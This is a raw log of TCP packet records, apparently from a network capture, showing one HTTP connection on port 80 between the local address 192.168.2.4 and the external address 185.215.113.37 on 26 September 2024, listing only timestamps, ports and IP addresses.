Sep 26, 2024 00:39:12.491877079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491888046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491894007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491902113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491910934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491913080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491935015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491946936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491947889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491985083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492044926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492057085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492069960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492079020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492089033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492094040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492100954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492105961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492124081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492141008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492311001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492322922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492333889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492353916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492368937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492486000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492525101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492588043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492598057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492609024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.492630005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.492645025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.613010883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613042116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613054991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613090992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613102913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613115072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.613118887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613131046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613138914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.613169909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613178968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.613181114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613225937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.613275051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613293886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613302946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.613308907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.613339901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.614399910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614412069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614423037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614439011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614449978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614449978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.614483118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.614583969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614595890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614608049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614626884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.614648104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.614702940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614712954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614725113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614736080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.614749908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.614777088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615300894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615310907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615320921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615331888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615353107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615370035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615492105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615500927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615511894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615530014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615549088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615808964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615829945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615840912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615853071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615859985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615864038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615880966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615895033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615901947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615912914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615914106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615925074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615936041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615940094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615947008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615957022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615957975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.615967989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615979910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615988970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.615993977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616002083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616019011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616031885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616038084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616063118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616085052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616094112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616096020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616106033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616125107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616125107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616137028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616143942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616151094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616163015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616170883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616199017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616328955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616339922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616349936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616374969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616396904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616400003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616409063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616420031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616430044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616446018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616471052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616498947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616511106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616523027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616532087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616532087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616563082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616584063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616594076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616626978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616712093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616722107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616731882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616744041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616753101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616760969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616771936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.616771936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616791010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.616815090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.738943100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.738959074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.738970041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.738980055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.738991022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739000082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739046097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739049911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739065886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739077091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739088058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739090919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739100933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739115000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739121914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739154100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739207983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739244938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739702940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739723921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739741087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739752054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739761114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739767075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739773035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739788055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739789963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739805937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739808083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739816904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739831924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739837885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739844084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739854097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739865065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739873886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739881992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739886045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739902020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739911079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739912987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739923954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739934921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739940882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739952087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739954948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739963055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739970922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.739974976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.739985943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740003109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740004063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740010977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740019083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740026951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740027905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740031958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740036964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740045071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740047932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740051985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740057945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740060091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740072012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740098000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740228891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740257025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740267038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740276098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740297079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740338087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740348101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740358114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740369081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740377903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740379095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740396976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740397930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740407944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740415096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740438938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740442038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740452051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740461111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740472078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740487099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740509987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740540981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740552902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740564108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740576029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740590096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740608931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740627050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740638018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740648031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740674019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740689993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740734100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740808964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740818977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740830898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740850925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740876913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740899086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740910053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740920067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.740947008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.740972996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861341000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861371040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861382008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861401081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861427069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861427069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861429930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861468077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861471891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861515045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861538887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861548901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861569881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861598969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861604929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861630917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861630917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861665010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.861674070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861686945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.861764908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862616062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862659931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862660885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862667084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862698078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862700939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862714052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862726927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862740993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862756968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862802982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862813950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862827063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862844944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862894058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862904072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862906933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862931013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.862943888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862955093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.862999916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.863609076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863636017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863646030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863655090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.863656998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863688946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.863688946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.863797903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863807917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863823891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863841057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863850117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863862038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.863862038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.863883972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.863954067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.863996983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.864007950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864023924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864032984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864037991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864046097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864056110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864063025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.864063025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.864088058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864098072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864098072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.864126921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864145994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.864145994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.864170074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864173889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.864181995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.864197016 CEST	80	49730	185.215.113.37	192.168.2.4
